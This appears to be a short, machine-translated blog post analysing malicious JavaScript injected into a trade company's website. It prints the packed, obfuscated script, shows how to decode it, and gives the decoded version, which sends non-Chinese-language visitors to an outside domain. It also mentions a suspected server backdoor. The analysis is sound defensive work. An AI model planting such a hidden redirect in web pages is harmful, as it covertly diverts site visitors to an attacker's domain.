Jump code decryption added to a foreign trade company website

The website of the foreign trade company where one machine oil is located was found daily, and the following code (missing) was found)
Eval (function (p, a, c, k, e, d) {e = function (c) {return c. toString (36 )};
 
If (! ''. Replace (/^/, String) {while (c --) {d [c. toString (a)] = k [c] | c. toString (a)} k = [function (e) {return d [e]}]; e = function () {return '\ w + '};
 
C = 1 };
 
While (c --) {if (k [c]) {p = p. replace (new RegExp ('\ B' + e (c) + '\ B', 'G'), k [c])} return p} ('7 0 = 4.0;
 
3 (0 = 2) {0 = 4.8}; 3 (0! = 2 & 0.6 (\ '5 \ ') <=-1) {9.a= \' I \ '+ \ 'J: /\ '+ \'/g \ '+ \ 'F. B \ '+ \ 'd \' + \ 'e. c \ '+ \ 'H/\'} ', 20, 20, 'language | null | if | navigator | zh | indexOf | var | browserLanguage | location | href | he | rvele | geu | w | ww | om | ht | tp '. split ('|'), 0 ,{}))
Decryption is simple.
 
Change eval to document. write.
Output source code
 
Var language = navigator. language; if (language = null) {language = navigator. browserLanguage}; if (language! = Null & language. indexOf ('zh ') <=-1) {location. href = 'ht '+ 'tp:/' + '/ww' + 'w. he '+ 'rvele' + 'geu. c' + 'om /'}
Target Website:
 
Http: // www. hervelegeu.com
The server has been infected daily. It seems that there is a SETHC backdoor, Which is driver-level.
It is estimated that this is the group of people.
Hundreds of websites are miserable!

Author yezi